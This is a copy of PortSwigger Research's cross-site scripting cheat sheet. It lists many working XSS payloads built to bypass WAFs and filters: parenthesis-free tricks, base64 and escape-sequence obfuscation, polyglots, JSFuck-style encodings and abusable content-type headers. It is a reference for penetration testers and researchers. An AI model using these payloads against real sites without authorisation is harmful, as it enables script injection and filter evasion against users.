Cross-site scripting (XSS) cheat sheet

This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. You can select vectors by the event, tag or browser and a proof of concept is included for every vector.

You can download a PDF version of the XSS cheat sheet.

This cheat sheet was brought to by PortSwigger Research. Follow us on twitter to recieve updates.

Downloaded from https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

This cheat sheet is regularly updated in 2020. Last updated: Mon, 21 Sep 2020 14:09:36 +0000.

Restricted characters No parentheses using exception handling <script>onerror=alert;throw 1</script> Copy No parentheses using exception handling no semi colons <script>{onerror=alert}throw 1</script> Copy No parentheses using exception handling no semi colons using expressions <script>throw onerror=alert,1</script> Copy No parentheses using exception handling and eval <script>throw onerror=eval,'=alert\x281\x29'</script> Copy No parentheses using exception handling and eval on Firefox <script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script> Copy No parentheses using ES6 hasInstance and instanceof with eval <script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script> Copy No parentheses using ES6 hasInstance and instanceof with eval without . <script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script> Copy No parentheses using location redirect <script>location='javascript:alert\x281\x29'</script> Copy No parentheses using location redirect no strings <script>location=name</script> Copy No parentheses using template strings <script>alert`1`</script> Copy No parentheses using template strings and location hash <script>new Function`X${document.location.hash.substr`1`}`</script> Copy No parentheses or spaces, using template strings and location hash <script>Function`X${document.location.hash.substr`1`}```</script> Copy

Obfuscation Data protocol inside script src with base64 <script src=data:text/javascript;base64,YWxlcnQoMSk=></script> Copy Data protocol inside script src with base64 and HTML entities <script src=data:text/javascript;base64,YWxlcnQoMSk=></script> Copy Data protocol inside script src with base64 and URL encoding <script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script> Copy Iframe srcdoc HTML encoded <iframe srcdoc=<script>alert(1)</script>></iframe> Copy Iframe JavaScript URL with HTML and URL encoding <iframe src="javascript:'%3Cscript%3Ealert(1)%3C%2Fscript%3E'"></iframe> Copy SVG script with unicode escapes and HTML encoding <svg><script>\u0061\u006c\u0065\u0072\u0074(1)</script></svg> Copy

Polyglots Polyglot payload 1 javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> Copy Polyglot payload 2 javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//> Copy Polyglot payload 3 javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'> Copy

WAF bypass global objects XSS into a JavaScript string: string concatenation (window) ';window['ale'+'rt'](window['doc'+'ument']['dom'+'ain']);// Copy XSS into a JavaScript string: string concatenation (self) ';self['ale'+'rt'](self['doc'+'ument']['dom'+'ain']);// Copy XSS into a JavaScript string: string concatenation (this) ';this['ale'+'rt'](this['doc'+'ument']['dom'+'ain']);// Copy XSS into a JavaScript string: string concatenation (top) ';top['ale'+'rt'](top['doc'+'ument']['dom'+'ain']);// Copy XSS into a JavaScript string: string concatenation (parent) ';parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain']);// Copy XSS into a JavaScript string: string concatenation (frames) ';frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain']);// Copy XSS into a JavaScript string: string concatenation (globalThis) ';globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain']);// Copy XSS into a JavaScript string: comment syntax (window) ';window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain']);// Copy XSS into a JavaScript string: comment syntax (self) ';self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain']);// Copy XSS into a JavaScript string: comment syntax (this) ';this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain']);// Copy XSS into a JavaScript string: comment syntax (top) ';top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain']);// Copy XSS into a JavaScript string: comment syntax (parent) ';parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain']);// Copy XSS into a JavaScript string: comment syntax (frames) ';frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain']);// Copy XSS into a JavaScript string: comment syntax (globalThis) ';globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain']);// Copy XSS into a JavaScript string: hex escape sequence (window) ';window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);// Copy XSS into a JavaScript string: hex escape sequence (self) ';self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);// Copy XSS into a JavaScript string: hex escape sequence (this) ';this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);// Copy XSS into a JavaScript string: hex escape sequence (top) ';top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);// Copy XSS into a JavaScript string: hex escape sequence (parent) ';parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);// Copy XSS into a JavaScript string: hex escape sequence (frames) ';frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);// Copy XSS into a JavaScript string: hex escape sequence (globalThis) ';globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);// Copy XSS into a JavaScript string: hex escape sequence and base64 encoded string (window) ';window['\x65\x76\x61\x6c']('window["\x61\x6c\x65\x72\x74"](window["\x61\x74\x6f\x62"]("WFNT"))');// Copy XSS into a JavaScript string: hex escape sequence and base64 encoded string (self) ';self['\x65\x76\x61\x6c']('self["\x61\x6c\x65\x72\x74"](self["\x61\x74\x6f\x62"]("WFNT"))');// Copy XSS into a JavaScript string: hex escape sequence and base64 encoded string (this) ';this['\x65\x76\x61\x6c']('this["\x61\x6c\x65\x72\x74"](this["\x61\x74\x6f\x62"]("WFNT"))');// Copy XSS into a JavaScript string: hex escape sequence and base64 encoded string (top) ';top['\x65\x76\x61\x6c']('top["\x61\x6c\x65\x72\x74"](top["\x61\x74\x6f\x62"]("WFNT"))');// Copy XSS into a JavaScript string: hex escape sequence and base64 encoded string (parent) ';parent['\x65\x76\x61\x6c']('parent["\x61\x6c\x65\x72\x74"](parent["\x61\x74\x6f\x62"]("WFNT"))');// Copy XSS into a JavaScript string: hex escape sequence and base64 encoded string (frames) ';frames['\x65\x76\x61\x6c']('frames["\x61\x6c\x65\x72\x74"](frames["\x61\x74\x6f\x62"]("WFNT"))');// Copy XSS into a JavaScript string: hex escape sequence and base64 encoded string (globalThis) ';globalThis['\x65\x76\x61\x6c']('globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x61\x74\x6f\x62"]("WFNT"))');// Copy XSS into a JavaScript string: octal escape sequence (window) ';window['\141\154\145\162\164']('\130\123\123');// Copy XSS into a JavaScript string: octal escape sequence (self) ';self['\141\154\145\162\164']('\130\123\123');// Copy XSS into a JavaScript string: octal escape sequence (this) ';this['\141\154\145\162\164']('\130\123\123');// Copy XSS into a JavaScript string: octal escape sequence (top) ';top['\141\154\145\162\164']('\130\123\123');// Copy XSS into a JavaScript string: octal escape sequence (parent) ';parent['\141\154\145\162\164']('\130\123\123');// Copy XSS into a JavaScript string: octal escape sequence (frames) ';frames['\141\154\145\162\164']('\130\123\123');// Copy XSS into a JavaScript string: octal escape sequence (globalThis) ';globalThis['\141\154\145\162\164']('\130\123\123');// Copy XSS into a JavaScript string: unicode escape (window) ';window['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');// Copy XSS into a JavaScript string: unicode escape (self) ';self['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');// Copy XSS into a JavaScript string: unicode escape (this) ';this['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');// Copy XSS into a JavaScript string: unicode escape (top) ';top['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');// Copy XSS into a JavaScript string: unicode escape (parent) ';parent['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');// Copy XSS into a JavaScript string: unicode escape (frames) ';frames['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');// Copy XSS into a JavaScript string: unicode escape (globalThis) ';globalThis['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');// Copy XSS into a JavaScript string: RegExp source property (window) ';window[/al/.source+/ert/.source](/XSS/.source);// Copy XSS into a JavaScript string: RegExp source property (self) ';self[/al/.source+/ert/.source](/XSS/.source);// Copy XSS into a JavaScript string: RegExp source property (this) ';this[/al/.source+/ert/.source](/XSS/.source);// Copy XSS into a JavaScript string: RegExp source property (top) ';top[/al/.source+/ert/.source](/XSS/.source);// Copy XSS into a JavaScript string: RegExp source property (parent) ';parent[/al/.source+/ert/.source](/XSS/.source);// Copy XSS into a JavaScript string: RegExp source property (frames) ';frames[/al/.source+/ert/.source](/XSS/.source);// Copy XSS into a JavaScript string: RegExp source property (globalThis) ';globalThis[/al/.source+/ert/.source](/XSS/.source);// Copy XSS into a JavaScript string: Hieroglyphy/JSFuck (window) ';window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);// Copy XSS into a JavaScript string: Hieroglyphy/JSFuck (self) ';self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);// Copy XSS into a JavaScript string: Hieroglyphy/JSFuck (this) ';this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);// Copy XSS into a JavaScript string: Hieroglyphy/JSFuck (top) ';top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);// Copy XSS into a JavaScript string: Hieroglyphy/JSFuck (parent) ';parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);// Copy XSS into a JavaScript string: Hieroglyphy/JSFuck (frames) ';frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);// Copy XSS into a JavaScript string: Hieroglyphy/JSFuck (globalThis) ';globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);// Copy

Response content types This section lists content-types that can be used for XSS when you can inject into the content-type header. Content-Type text/plain; x=x, text/html, foobar text/html(xxx text/html xxx text/html xxx text/html, xxx text/html; xxx Browsers PoC <script>alert(document.domain)</script> <script>alert(document.domain)</script> <script>alert(document.domain)</script> <script>alert(document.domain)</script> <script>alert(document.domain)</script> <script>alert(document.domain)</script>